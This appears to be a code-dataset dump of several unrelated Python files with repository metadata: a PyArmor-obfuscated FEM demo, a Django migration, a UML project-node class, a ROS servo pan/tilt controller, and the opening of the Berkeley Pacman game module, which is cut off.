da75986cbc1d4510dcb5325a595f3096edd3d2ec | c8c1c8b3327ae93ceaa671681d5f9eac0933e738 | /mrgpylinux/femcalc/examples/fem/demo_line_assembly.py | 837c8b5d5ef20759ed65594190a3a3dedcd59fb6 | [] | no_license | gpspelle/acoustic-pollution | bbb2a6492b3d02d046cb533470affabcacb38409 | ad80f1fd582f47ce679748bb6ac93ff3149fd445 | refs/heads/master | 2022-07-28T06:49:20.493083 | 2019-11-15T00:27:52 | 2019-11-15T00:27:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,027 | py | __pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x06\x00\x33\x0d\x0d\x0a\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x7b\x0a\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xeb\x50\x8c\x64\x26\x42\xd6\x01\x6f\x0f\x27\xa2\x64\x8d\x1e\xb5\x54\xd9\x61\x57\x2f\x56\x8b\xbd\xed\xc2\xbe\xf6\x72\xf3\xcd\xb6\xf9\x10\x10\x41\x05\xc7\x37\xbe\x1f\x99\xc6\xea\x7b\x42\x99\x17\x72\x70\xda\x72\xb1\xc4\x68\xbc\xd7\xfd\xab\x27\x7d\x42\xc3\x26\x20\xe4\xad\x09\x1e\x83\x33\x79\x49\x5a\xc1\x2a\x98\x25\x2c\x50\x0e\xef\x93\x50\xcf\x61\x21\x40\xf1\xa7\xdf\x52\x5c\x7f\xfc\xe1\xa8\xa8\x7b\xb7\xbe\x98\xff\x15\xae\x70\x84\x8c\x7f\x7f\x6d\x97\x37\xd0\x51\xcb\x31\xed\xe8\xe7\x35\xe6\x46\x33\x20\x7d\x81\x1e\xb2\x31\x56\x57\x16\xe2\x91\xc2\x3f\xd3\xc0\xd6\xe0\x97\xa1\xca\xae\x5f\x03\xc9\x9d\x25\x55\x19\x84\xcf\x64\x94\x8b\x2d\x4b\x90\x55\xb2\x9f\xea\xf1\xe0\x34\xbd\xef\x1d\xe4\x9f\xe9\x4d\x48\x4f\xf4\x07\xd1\xfd\xbc\xcc\xec\x8d\x1a\x16\x22\x42\x29\xa0\x23\x42\x27\x6a\x55\x6e\x48\x8c\xde\xd9\x68\xa2\x3d\x6a\xc7\xd6\x98\xc5\xd6\x08\x26\x76\x8f\x22\xa4\x7a\x37\xb5\x95\x38\xe2\xa7\x23\xfc\xb4\xb7\x2f\x18\x5d\x6b\xf2\xb9\xcc\x86\x62\x0d\xbd\x36\x34\x75\x56\x3c\x57\x2e\x16\x40\x08\xd9\x28\x42\xd5\xf4\x17\xbb\x23\xf7\x91\x74\xe9\xf7\x9f\xa2\x1e\x52\x7a\x5e\xa7\xdf\xf3\xff\xbe\xb1\xa8\x9b\xc2\xc8\x0e\x99\xe4\xa3\xd9\x25\xf4\xb6\x3e\xbf\x04\x96\xc9\x8f\xc8\xb8\x17\x21\x28\xa5\x3c\x22\x61\xe6\xe5\x9f\x78\x47\x4b\xc2\x33\x56\x64\xb0\x49\x27\x35\xf8\x53\x2e\xb5\xd7\xf6\x57\x36\x4c\xfa\xa9\x35\x25\x54\x91\x2d\x1d\x3d\xd9\x8a\x4e\xbd\x65\x22\xa2\xd4\x79\xa2\xbc\x9f\xd1\xda\x6f\xd9\x43\x63\x69\x6c\x21\x89\x06\x7c\x4d\xb8\x31\x43\x95\xb5\x37\x53\xf0\xad\x78\xc0\xf9\x57\x07\xdb\xb3\x43\x9d\x9c\x60\x77\xad\x3f\xd7\x33\x7e\xa1\x82\xc8\xaa\x1e\x23\x17\x65\x5e\x8b\xe9\xc6\x14\xa1\xd6\x67\xbf\x09\xd6\x38\x14\x0f\x3a\xa4\xc1\x8d\xe0\x22\x95\xf1\xc7\x7b\x1f\x0e\x92\x27\x87\xdc\x01\xcf\x34\x83\x3b\x75\xe5\x22\x2d\xfb\x91\x55\x50\xa2\xbd\x95\x7e\xcf\x23\x22\x1a\x99\x7d\x50\xff\x4d\x71\xd4\xa3\xf9\x6b\x6a\x7d\x35\xc0\xee\x24\xf7\xc4\x13\x7c\xdd\x99\xd7\x75\xf8\x5c\x84\x8b\xe4\x7f\xee\x1b\xcc\xad\x70\x69\x7c\xba\xfb\xcd\xc3\x84\xf5\x4e\xa6\x82\xa3\x4e\x71\xcf\x0b\x79\xe3\xbc\x55\x73\x93\xd5\x15\x1f\x0a\xe0\x6f\x3a\x6e\xcc\xf2\x15\xf6\x21\xcb\xde\x30\x96\x4b\xb7\x50\x76\x9b\x6e\x0c\xb1\x2a\x3e\xcd\x57\x4b\x37\x40\xcd\x80\x88\x9f\xe8\x44\x48\x41\x69\xcb\x10\xf4\x8e\x35\x67\x64\xf9\x73\xb8\x4b\xcd\x39\xe5\x2a\x5b\x84\xfd\x52\xad\xba\x55\x96\xb4\x25\x09\x62\xa3\xdf\xea\xb1\x17\xde\xb0\x0d\xa7\x96\x40\x1a\xc2\x94\xcc\x4a\x86\x3b\x7c\x79\xd0\x36\xb7\x73\x0f\xfb\xbe\x91\xbc\x58\x8e\xf1\xe4\x91\x4d\x94\x85\x8a\x1a\xb2\xc5\x62\xcb\xe3\x7d\x81\x72\x2c\x34\xa7\x44\x7f\x93\x6e\x1c\xc7\xdf\x78\x63\x05\xa4\x63\x22\x05\x28\x31\xe0\xe8\x0d\xd8\xcc\xb0\xaa\xb6\xe5\x47\x10\x39\x4e\x9c\x99\xc4\xbf\x4f\x04\xc0\x90\x7b\x89\x7e\x89\x6c\x86\x56\x74\xf2\xb5\x1c\xb5\x2f\xeb\x4a\x10\x9c\x57\x2c\xdd\x0d\xe0\x4b\x3c\x42\xa9\x6c\x3d\x54\x89\x73\x1a\x7a\x15\x35\x7e\x22\x02\x05\xb1\x73\xe8\x3f\x0f\xdd\xb9\x7a\x5d\xb2\x48\x06\x4a\x3f\xf1\x8d\xb1\xd4\xd8\xd1\x61\xbb\x1b\x10\xb8\x69\x33\x02\x22\xa4\xf5\x0e\x2d\x80\x20\xe5\x54\xcd\xf7\xd8\x27\x18\x40\xd4\x52\xa9\xb9\xfc\x7f\xa5\x09\x22\x78\xd4\xcb\x5c\xb2\xa0\x6c\xca\x2c\x99\x38\x72\xcf\x1e\x87\x0d\xdf\xcc\x27\xa2\xc6\xce\x50\xd9\xfd\x06\x6b\x42\x9f\x31\xe1\x86\x6c\xd4\xb1\xf1\x3b\xd1\x59\x8c\xb8\xb5\x96\x95\x22\xdc\xec\x4b\xfe\x75\x6e\x22\x26\xad\x16\x44\x52\x93\xef\x52\x9e\x08\x82\x5e\xc3\x4d\x9d\x7c\xf1\x09\xd0\x8d\x8b\xec\xb1\xeb\x5b\x08\x82\xf1\x1a\x62\xcf\x98\x90\x52\x2e\x77\x9e\xbc\xcb\x43\xd7\xc7\xa2\xc7\x84\xf1\xbe\xc3\xe9\x9a\x06\xbb\xa5\x2f\x8c\x2b\xc0\xba\x07\x91\xea\x04\xf5\x80\xe8\xc6\x62\xf4\x81\x87\x9b\xc6\xb1\x28\xfa\x84\xf3\x2c\x24\x61\xaf\x1f\xc0\xa2\x1b\xda\x74\x91\x59\x08\x81\xe2\x15\xbc\x50\x2b\xd7\x3e\x3c\x36\x4b\x5a\x2a\x71\xdb\xbe\x28\xba\x12\xc5\x95\x44\x5b\xa8\x84\xa4\xf6\x1f\xa2\xe0\xd3\x22\xf3\x6c\x98\x11\x79\x85\x6d\x81\xee\x3f\x0b\xd1\xb3\x51\xaf\xe1\xcf\x9e\xff\x88\x53\x27\x38\x10\x6c\x1e\xad\x8b\x01\x0b\xac\xd1\x08\x83\x7b\x09\x9f\x87\x1f\x1d\x29\x38\x43\x09\x58\xbb\xc3\x0a\xdd\x4c\x18\x9e\x95\xa6\x1d\x3f\x8b\x72\xe8\xa7\x61\x58\xde\x8f\xba\x45\x97\x27\xe7\x3d\xf4\x59\x95\x45\xe2\xd8\x4b\x72\xec\xcc\x1d\x82\x19\x46\x8e\xdf\x4a\x7a\xb3\xd8\x6f\xe5\x04\x2e\x00\xb7\xee\x7f\x44\x2a\xeb\xaf\x5f\xe9\x9b\xfa\x8d\x5d\x7a\x76\x71\x2f\xc5\xf1\xa7\x9a\xc9\x93\xa2\xe0\x9c\xbd\x1e\x47\xfb\x61\x3b\x58\x34\xd6\x10\xbc\x6f\x17\xa1\x9d\xfd\x32\xd3\x96\x0e\xba\x27\x2c\xe4\x2e\x5c\x21\xbb\x9e\xbe\x5c\x15\x87\xcf\x77\x4d\x24\xdf\xee\x1e\x78\xb2\xcd\xe0\x91\xb2\xa2\x8d\x03\x99\x00\xbc\x3b\x86\x20\x8f\xe9\x4b\x35\xf6\xe8\x24\x3e\x8b\xe2\x9c\xb9\x2a\xaa\xa6\x19\x24\x11\x46\x10\x7b\xd4\xb4\x12\x81\x8f\x0a\x0c\x6a\xcc\x11\x41\xe9\x61\x15\xba\x12\x3c\xcc\xd0\xe7\x5c\x61\xf4\x1c\x12\x5f\xe4\x24\x55\x2f\x3c\xe3\x34\xde\xf0\x3e\x9e\xaa\x1f\xc4\xa1\x4b\x02\x52\x72\x99\x64\xb2\xbc\x34\x02\x7c\x8a\x07\xa9\xea\xbf\x6b\x74\x3f\xaa\xb2\x7e\x06\x01\xea\x5b\x07\x62\x8f\x0d\xf6\xc1\xce\xde\x97\x43\x5a\x2d\x86\x6d\x17\x35\x65\x5c\xb2\x8b\x32\x55\xdf\x71\x70\xda\xd5\x51\x8a\x7d\xa4\x05\xcd\x29\x1e\x6b\x61\x0a\xc4\x34\x4d\x99\x00\xc2\xbc\x25\x5b\x01\x54\xf3\xe6\x73\x8b\x8d\x69\x83\x62\x58\x54\xf8\xa5\x50\xfa\x5a\x93\xad\x89\x36\x8b\x18\x75\x52\xfc\x7e\xca\x0b\x2c\xf8\xba\x78\xd7\x96\x8e\x84\x36\x31\xc1\x85\x45\xaf\xe1\x1d\xf1\x00\x48\x6f\x92\x6f\xcd\x47\x10\xb8\x92\xaa\xc4\x87\xfe\xd1\x12\xfc\x6e\x3a\x93\xef\x03\x0b\x62\xba\x46\x1f\x3f\x0a\x40\xa2\xd8\xb0\x93\x77\x93\xd2\x5e\xd6\x15\xb1\xb6\x3b\xab\x22\x69\x53\xfd\x38\x0b\x82\xaa\x4e\x9f\xbc\x7e\xde\x2f\x66\xbb\xd7\x04\x88\x2f\x9a\xf7\x54\xb5\xb1\x46\x00\xbb\x37\x68\x30\xd0\xb0\x58\xe6\xd6\x46\x44\x00\x5a\xee\x4e\x4e\x85\xf3\x96\xb7\x06\x1a\x89\xe9\xd1\x74\x84\x6c\x97\xaa\xee\x4b\x03\xe8\x24\xce\x70\x05\x26\x85\x7e\x50\x6c\x6f\x08\x42\xd7\xcc\x3a\x10\xff\x08\x47\x24\x66\x8c\xe5\xe5\x68\x3a\x43\x48\x0a\x75\x9f\xd3\xc3\x8f\xb2\x58\x38\x54\x04\xdb\xc1\xfc\x42\x4c\x2d\x38\xe7\x1a\x06\x9b\xc6\xab\xba\x33\x54\xc8\xae\x17\x1e\x10\x67\x4a\xb1\x09\x99\x0c\xe5\xb9\x34\xd8\xf3\xd7\xdb\xc2\x42\x51\xdd\x5f\x3f\x53\xa7\x78\x06\x97\x26\xb1\xb5\xb6\xe6\x17\x38\xe8\xbb\xaf\x98\x57\x9c\x92\x8a\x3e\x2a\x30\x70\xbe\xce\x97\x69\xd3\x54\x8e\x22\xec\xdc\x4a\xf4\xb5\x5b\xa3\x37\x5a\x2c\xbf\x77\x2a\xfd\x79\xb4\x5e\x6c\x88\x1c\x07\x53\xcf\x8d\xa2\x4b\x68\x4d\x66\xe8\x89\x26\x15\x39\x1c\xa9\x3a\x1b\x32\xd1\xd1\xb6\x18\x9f\x46\xb2\x73\x69\x12\x77\x84\xdf\xfe\xb8\xfd\x2b\xc5\x4d\x37\x0c\xec\x5e\x4c\x74\x72\xc7\x54\x20\x66\x58\xda\x6b\xf3\x9b\x22\xfe\xcd\x93\x81\x4b\xba\x98\xb1\xf8\x28\xb4\x22\x31\xc6\x33\x33\x4c\x32\x3d\x58\x23\x83\xcf\x53\x60\x76\xcf\xab\x8f\x59\x10\x05\x02\x60\x9e\xb7\x72\x8d\xef\xfd\x36\x11\x04\xdd\x79\x0e\xe8\xb7\xc7\x3b\x3d\xcf\x43\xd0\x4e\xd9\x3e\x66\x9f\x40\xcc\xe8\x40\x95\x1a\x2b\xd6\x92\x3a\x85\xb9\x67\x50\x1e\x3a\x51\xb5\x0a\x21\xdf\x94\x85\x74\x7a\xf3\x71\xa8\x92\xc1\xb9\x5e\x05\x77\xa3\x41\xd7\xc2\xdb\xa4\x8f\x8d\x63\xef\xb3\x0e\xdb\xe7\x63\x0a\x1b\x31\x05\x0d\xa9\x04\x9d\xa8\xf1\x75\x8d\x6b\xd5\x75\x1a\x1d\xa7\x67\xd2\xa9\xcf\x71\x39\x84\x46\x42\xf2\xba\xfa\x7d\x57\xef\x22\x16\xca\x85\xe2\x2b\x6c\x72\x5f\x4f\x09\x8b\xa3\xc0\xf7\xf7\x2c\x0f\x31\x35\x44\xb1\x25\x54\x37\x64\xf7\xcb\x13\x0a\x27\x9d\x3a\xde\x37\x86\x32\xc5\x6e\x4f\x00\x46\x7b\x2f\x59\x30\x44\x67\x17\xa1\xbb\xdd\x33\xae\x67\x2a\xec\xb4\xad\x4d\x52\x49\x4c\xfd\x37\x77\xb1\xde\xef\xde\x6c\x42\x07\xe7\x09\x9c\xde\x8d\x22\xf3\x6b\xce\x55\x11\xf5\xdf\x8b\xd5\x1b\xd5\x40\x5d\x98\xd2\x3a\x0e\xea\x8c\x08\x6e\x37\x2f\x98\x34\x5b\x02\x64\x45\x6b\x46\xec\x37\xb7\xd0\x96\x34\xf1\x94\x3e\xca\x83\x5d\x73\xa7\x31\xdc\xc4\xa9\x2b\x49\x4c\xfd\xef\xc4\xf4\x2a\x66\x39\xc5\xaa\x33\x2d\xa5\x22\xec\x9f\xaf\x04\xf9\x86\x1b\xd8\x9e\xc1\xfb\xa4\x37\x12\x6d\x60\xc7\xd3\xa8\xd0\xb0\x7e\xc2\xb8\x77\x2f\x97\x27\x14\x0d\x72\x2a\x56\xe0\x06\x69\x4c\x0b\xd9\x4f\x4a\xd5\xcc\x5d\x11\xdf\xea\xc7\x59\x74\x8d\x32\x90\xa2\x4b\x3e\x7e\x28\xdf\x3f\x6a\xdb\xb5\x4e\xf0\xed\x22\x5e\x43\x84\x21\xcf\x67\x01\x7e\xb5\xa2\x70\xa5\x05\x35\x14\xca\x69\x27\x8c\x6b\xbb\x94\x63\xac\xf1\x0b\xdb\x2b\xbe\x49\x9f\x55\x47\x82\x58\xce\xc3\xad\xc9\xe1\x48\x8d\x6f\xc9\x4f\xea\x10\xb2\x29\xb0\x77\xd3\xed\x57\x3b\x53\x16\xb1\x2f\x83\xee\x3e\x7d\x32\x0c\x8e\x19\xb2\x79\x24\x5c\xb9\x56\x20\x68\x2a\x72\xc0\x70\x65\x2c\x07\x06\xc2\x40\x87\x7e\x4d\xb9\x91\xf2\x8d\x0b\x09\xe3\xb9\x6e\x55\xaf\x7a\x8e\xa7\x1a\x39\x59\x86\xc1\x9b\x96\x0d\x47\xf7\x61\x9f\xc7\xe1\x2c\x8a\x43\x9c\x57\xa5\xb2\x8b\x95\xf9\x42\xbe\x19\x27\x8c\xf9\x9a\xa1\x2c\xdd\xde\x74\x96\x14\x4e\xcc\xf7\xea\x80\x6c\xc1\x4a\xb7\xd3\x91\xd2\xb0\xba\xd9\x8f\x4c\xa0\xd4\x8b\x47\xf5\x0b\xc2\x82\x8e\x32\x69\x4e\xc8\x43\x0a\xf6\x2b\x55\xc5\x32\x50\xa9\x97\x24\x8f\x4e\x26\xe9\x8a\x63\xa1\xa3\x03\x8b\x3f\x9f\xe6\x79\x97\x1e\xe0\x1f\x97\xfc\xab\x28\x81\x02\x98\xba\x77\x45\xcc\x29\xe7\xfa\xa8\x93\x07\x52\x7b\x94\xe1\x38\x82\x85\x2b\xbb\xba\x11\x39\x50\xe2\x82\x91\x1b\xd8\x8a\x53\x21\xb3\x5a\x6f\xd5\x63\x79\x11\x40\xef\xa4\x45\xac\xc9\x32\xbc\x3a\xe7\x4e\x87\x7e\x33\xc4\xdf\x04\x13\xaa\x54\xa1\xde\x8d\x03\xab\xe4\x77\x01\x3b\x21\x54\xc6\x12\xbf\x64\x1d\x73\x61\x9c\xec\x47\x8c\xed\x15\xd3\x9f\xd2\xe7\xae\x25\x47\xf9\x78\xd7\x9b\x1d\x39\x4f\xc2\x09\x38\x01\x9e\x06\x0e\x15\x19\x80\x59\xb5\x86\x31\x0f\x86\xb2\x35\xf5\xe2\x07\x72\x4c\x8c\xa2\x00\x26\x3d\x69\x72\x0c\x78\x6e\x5f\xe0\x61\x6e\xb9\x38\x31\xb3\xf3\xe2\x4e\x66\x70\x21\xb3\xb4\x18\x4e\x56\xb4\x1f\x39\x90\xad\x0d\xcc\x54\xcf\x04\xa9\x8a\x0b\xd2\xd5\xc6\xae\x5a\x75\x0e\xce\x33\x91\xe4\x21\x0a\xce\x5b\x12\x14\x7f\x4c\x73\x26\xc1\x93\x89\x76\x88\x81\xf9\x6c\x30\x57\xb7\x24\x8c\xb6\x78\x94\xd4\x0b\x8e\xd9\x60\x40\x1a\x25\x7d\x69\x93\x5d\xcb\xbc\xbf\xba\xba\x47\x7b\xc7\xec\x3b\x0d\xfb\x2b\xa7\x09\x7a\xa1\xf2\x63\x7f\xb0\x61\x95\x29\xcc\x3c\xf0\x84\x54\x87\xcc\x80\x4b\xbd\x3e\x2c\x64\x81\xee\x3f\x7b\xd1\xda\x0b\x83\x95\x98\x3e\x5c\x09\x4b\x44\xd7\xf7\x71\x77\x8b\x37\xaa\x5a\x42\x69\xe6\x6e\xc6\x8c\x55\x26\xeb\xfc\x89\x7b\x50\xf7\x2e\x10\xaf\xb4\xf3\xbd\xbd\x25\xeb\x37\x50\x46\xf8\xb3\x05\x42\xc5\x5e\x41\x16\xb5\x1d\x53\x90\x26\xfe\xdb\x9e\x7d\xb1\x1b\x83\x42\x21\x21\x69\x90\xda\x99\x00\x28\xaa\x03\x88\x90\x3f\x20\x0c\x7a\xa2\xcd\x3f\xff\x17\xe1\x51\x30\xec\x51\x0f\x5d\xc4\x51\xd0\xab\x26\x7b\x99\x20\xe3\x57\x57\xf0\x09\x1f\x01\x1c\x7d\xdd\x68\x56\x9b\x75\x26\x08\x2f\xd5\xe9\xf1\x93\xde\x0c\x4f\x73\x4a\x10\x08\xe4\x32\xc1\xa6\xb4\x36\x82\x4f\x27\xd0\x89\x8a\x96\xb1\x17\x6c\x67\x44\x45\x1a\xa1\x87\x2f\xbf\x85\xc3\x63\x50\x73\xc8\xe5\x8d\x87\x95\x6d\xec\xb0\x46\x83\x32\x87\xa8\x71\x1d\xb1\x87\x61\x65\x25\x6f\xf1\x2d\x22\xe1\x14\x16\x30\x61\x01\x52\x39\x08\xd1\xa2\x7b\xe0\x96\x57\xc0\x45\x16\x25\x48\x89\xdf\x53\x29\x80\xa3\xf0\xb7\x8e\x04\xe5\xd5\xdc\xc8\xca\x51\x11\x5f\xd5\x96\x68\x09\x60\xf3\xbd\x33\x31\x6a\xd1\x9e\xc3\x5b\x17\xac\x86\xef\xc3\xd3\x09\xa8\x20\xc3\xa2\x38\x3c\xb9\x7a\xe1\xa5\xd3\xee\x9d\x40\x37\xbd\x45\x1d\x4d\x0d\xc8\x80\xd4\x37\x81\x73\x3a\xe5\xf1\xcf\x4f\x7f\x1c\xa2\x2c\xaa\xc6\x13\xa2\x74\x79\x72\x2d\x5e\x1e\x57\x00\x7d\x9f\x44\x26\x65\x20\x62\xe0\x76\x9f\xc4\x27\x6b\x1d\x67\x5b\xe8\x30\xc5', 1) | [
"[email protected]"
] | |
d128117ff4ab9ee0203e6020aad91757346b332e | 90201c3debb9c6b8847899356f8ab02977089183 | /sistema_transporte/app_transporte/migrations/0002_auto_20200325_1338.py | 025332cfda9aa87a4095f65cca236dd17f5f0f17 | [] | no_license | Articfire/transporte-ddssc | 90bdca1d3dbb93646aae06711653379040ce50e8 | 2a8ca39a8c5bb38932af83ba1ae9996327824242 | refs/heads/master | 2022-12-13T01:15:04.276293 | 2021-12-12T22:41:11 | 2021-12-12T22:41:11 | 248,825,047 | 2 | 0 | null | 2022-12-08T03:53:23 | 2020-03-20T18:24:39 | Python | UTF-8 | Python | false | false | 695 | py | # Generated by Django 3.0.4 on 2020-03-25 20:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app_transporte', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Agenda',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.AlterField(
model_name='vehiculos',
name='estado',
field=models.IntegerField(choices=[(0, 'Disponible'), (1, 'En mantenimiento'), (2, 'En transporte')], default=0, max_length=1),
),
]
| [
"[email protected]"
] | |
22d1ca1354a720021e9a3bf6df46c8e4bb6dcbf7 | b01543933aa10e1db83c0273514aa36ff5c90bf4 | /lib/Projekt/ProjectNode.py | 258ae64164569462b92171ef4318c97ef9b8a25c | [] | no_license | umlfri-old/umlfri-historic | 96a5b9dda5a2bbc86969b0cae13daffa6af330b0 | 770e0a28eb2b88d2502f31935efa00c6943793ff | refs/heads/master | 2021-01-20T04:09:52.158277 | 2017-08-25T07:38:48 | 2017-08-25T07:54:23 | 101,382,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,673 | py | from lib.lib import UMLException
class CProjectNode(object):
def __init__(self, parent = None, type = None):
self.parent = parent
self.childs = []
self.drawingareas = []
self.type = type
def GetType(self):
return self.type
def GetName(self):
return self.type.GetName()
def AddChild(self, child):
if child not in self.childs:
self.childs.append(child)
child.parent = self
else:
raise UMLException("ExistsChild")
def AddDrawingArea(self, area):
if area not in self.drawingareas:
self.drawingareas.append(area)
else:
raise UMLException("ExistsArea")
def GetChild(self, name):
for i in childs:
if i.GetName() == name:
return i
else:
return None
def GetIndexChild(self, index):
if index <= len(self.childs) - 1:
return self.childs[index]
else:
raise UMLException("NodeNotExists")
def GetChilds(self):
return self.childs
def GetParent(self):
return self.parent
def RemoveChild(self, child):
if child in self.childs:
self.childs.remove(child)
else:
raise UMLException("ChildNotExists")
def RemoveDrawingArea(self, area):
if area in self.drawingareas:
self.drawingareas.remove(area)
else:
raise UMLException("AreaNotExists")
def SetParent(self, parent):
self.parent = parent
Parent = property(GetParent,SetParent)
| [
"[email protected]"
] | |
5f55cb53d30035dd743474f3a12cc8ea75207184 | fef45946632c023af452155b2c21f07774e65d55 | /node2.py | 27233a1ea5a2be171ef2249f0271556318316899 | [] | no_license | rikkimelissa/hackathon-1 | 975ea4069d288827de0eab951d08c6fbfa9a4f26 | c6401aa2dcdee45ef17c633031b74584a58bcc13 | refs/heads/master | 2021-01-17T08:43:02.717634 | 2015-09-18T21:39:54 | 2015-09-18T21:39:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,789 | py | #!/usr/bin/env python
import rospy
import roslib
from std_msgs.msg import String
import sys
import cv2
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
import serial
from std_msgs.msg import UInt16
pantarget = 1500
tilttarget = 1500
def node2cb(data, extra_args):
ser,var = extra_args
x = data.data
print x
global pantarget
global tilttarget
if var == 'x':
if x >= 340 and pantarget < 1950:
#increase pan target by
pantarget += 10
elif x <= 300 and pantarget > 1050:
pantarget -= 10
if var == 'y':
if x >= 260 and tilttarget < 1950:
#increase pan target by
tilttarget -= 10
elif x <= 220 and tilttarget > 1050:
tilttarget += 10
#tiltpos = bytearray([132,0,x,x])
#panpos = bytearray([132,1,x,x])
#paninput = int(x)
#tiltinput = int(raw_input("enter tilt value> "))
pancom = pantarget*4 & 0x7f
pancom2 = (pantarget*4 >> 7) & 0x7f
tiltcom = tilttarget*4 & 0x7f
tiltcom2 = (tilttarget*4 >>7) & 0x7f
#print pancom, pancom2
#print tiltcom, tiltcom2
panpos = bytearray([132,0,pancom,pancom2])
tiltpos = bytearray([132,1,tiltcom,tiltcom2])
ser.write(panpos)
ser.write(tiltpos)
def node2():
rospy.init_node('node2', anonymous=True)
ser = serial.Serial('/dev/ttyACM0')
initialpan = bytearray([132,1,112,46])
initialtilt = bytearray([132,0,112,46])
ser.write(initialpan)
ser.write(initialtilt)
rospy.Subscriber('node1pub', UInt16, node2cb,(ser,"x"))
rospy.Subscriber('node1pub2', UInt16, node2cb,(ser,"y"))
rospy.spin()
if __name__ == '__main__':
node2()
| [
"[email protected]"
] | |
730fc97a12a5abd0489bec6a397ddf28021d3d40 | 6737bcca9857b6a81bf11680cf7665635859e245 | /HW 7/multiagent/pacman.py | 4d1c4be7835e607fbd80159ead8c3f5c0508cd4f | [] | no_license | clive819/SCU-COEN-266 | 2b1ad4886ac4d54c8ae9c31a10836a61eddef911 | 65e5005631f640a3c1125f45a8b6125eeebbd2cc | refs/heads/master | 2023-01-22T01:05:12.166664 | 2020-11-22T21:18:47 | 2020-11-22T21:18:47 | 315,133,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,475 | py | # pacman.py
# ---------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# ([email protected]) and Dan Klein ([email protected]).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel ([email protected]).
"""
Pacman.py holds the logic for the classic pacman game along with the main
code to run a game. This file is divided into three sections:
(i) Your interface to the pacman world:
Pacman is a complex environment. You probably don't want to
read through all of the code we wrote to make the game runs
correctly. This section contains the parts of the code
that you will need to understand in order to complete the
project. There is also some code in game.py that you should
understand.
(ii) The hidden secrets of pacman:
This section contains all of the logic code that the pacman
environment uses to decide who can move where, who dies when
things collide, etc. You shouldn't need to read this section
of code, but you can if you want.
(iii) Framework to start a game:
The final section contains the code for reading the command
you use to set up the game, then starting up a new game, along with
linking in all the external parts (agent functions, graphics).
Check this section out to see all the options available to you.
To play your first game, type 'python pacman.py' from the command line.
The keys are 'a', 's', 'd', and 'w' to move (or arrow keys). Have fun!
"""
from game import GameStateData
from game import Game
from game import Directions
from game import Actions
from util import nearestPoint
from util import manhattanDistance
import util
import layout
import sys
import types
import time
import random
import os
###################################################
# YOUR INTERFACE TO THE PACMAN WORLD: A GameState #
###################################################
class GameState:
"""
A GameState specifies the full game state, including the food, capsules,
agent configurations and score changes.
GameStates are used by the Game object to capture the actual state of the game and
can be used by agents to reason about the game.
Much of the information in a GameState is stored in a GameStateData object. We
strongly suggest that you access that data via the accessor methods below rather
than referring to the GameStateData object directly.
Note that in classic Pacman, Pacman is always agent 0.
"""
####################################################
# Accessor methods: use these to access state data #
####################################################
# static variable keeps track of which states have had getLegalActions called
explored = set()
def getAndResetExplored():
tmp = GameState.explored.copy()
GameState.explored = set()
return tmp
getAndResetExplored = staticmethod(getAndResetExplored)
def getLegalActions(self, agentIndex=0):
"""
Returns the legal actions for the agent specified.
"""
# GameState.explored.add(self)
if self.isWin() or self.isLose():
return []
if agentIndex == 0: # Pacman is moving
return PacmanRules.getLegalActions(self)
else:
return GhostRules.getLegalActions(self, agentIndex)
def generateSuccessor(self, agentIndex, action):
"""
Returns the successor state after the specified agent takes the action.
"""
# Check that successors exist
if self.isWin() or self.isLose():
raise Exception('Can\'t generate a successor of a terminal state.')
# Copy current state
state = GameState(self)
# Let agent's logic deal with its action's effects on the board
if agentIndex == 0: # Pacman is moving
state.data._eaten = [False for i in range(state.getNumAgents())]
PacmanRules.applyAction(state, action)
else: # A ghost is moving
GhostRules.applyAction(state, action, agentIndex)
# Time passes
if agentIndex == 0:
state.data.scoreChange += -TIME_PENALTY # Penalty for waiting around
else:
GhostRules.decrementTimer(state.data.agentStates[agentIndex])
# Resolve multi-agent effects
GhostRules.checkDeath(state, agentIndex)
# Book keeping
state.data._agentMoved = agentIndex
state.data.score += state.data.scoreChange
GameState.explored.add(self)
GameState.explored.add(state)
return state
def getLegalPacmanActions(self):
return self.getLegalActions(0)
def generatePacmanSuccessor(self, action):
"""
Generates the successor state after the specified pacman move
"""
return self.generateSuccessor(0, action)
def getPacmanState(self):
"""
Returns an AgentState object for pacman (in game.py)
state.pos gives the current position
state.direction gives the travel vector
"""
return self.data.agentStates[0].copy()
def getPacmanPosition(self):
return self.data.agentStates[0].getPosition()
def getGhostStates(self):
return self.data.agentStates[1:]
def getGhostState(self, agentIndex):
if agentIndex == 0 or agentIndex >= self.getNumAgents():
raise Exception("Invalid index passed to getGhostState")
return self.data.agentStates[agentIndex]
def getGhostPosition(self, agentIndex):
if agentIndex == 0:
raise Exception("Pacman's index passed to getGhostPosition")
return self.data.agentStates[agentIndex].getPosition()
def getGhostPositions(self):
return [s.getPosition() for s in self.getGhostStates()]
def getNumAgents(self):
return len(self.data.agentStates)
def getScore(self):
return float(self.data.score)
def getCapsules(self):
"""
Returns a list of positions (x,y) of the remaining capsules.
"""
return self.data.capsules
def getNumFood(self):
return self.data.food.count()
def getFood(self):
"""
Returns a Grid of boolean food indicator variables.
Grids can be accessed via list notation, so to check
if there is food at (x,y), just call
currentFood = state.getFood()
if currentFood[x][y] == True: ...
"""
return self.data.food
def getWalls(self):
"""
Returns a Grid of boolean wall indicator variables.
Grids can be accessed via list notation, so to check
if there is a wall at (x,y), just call
walls = state.getWalls()
if walls[x][y] == True: ...
"""
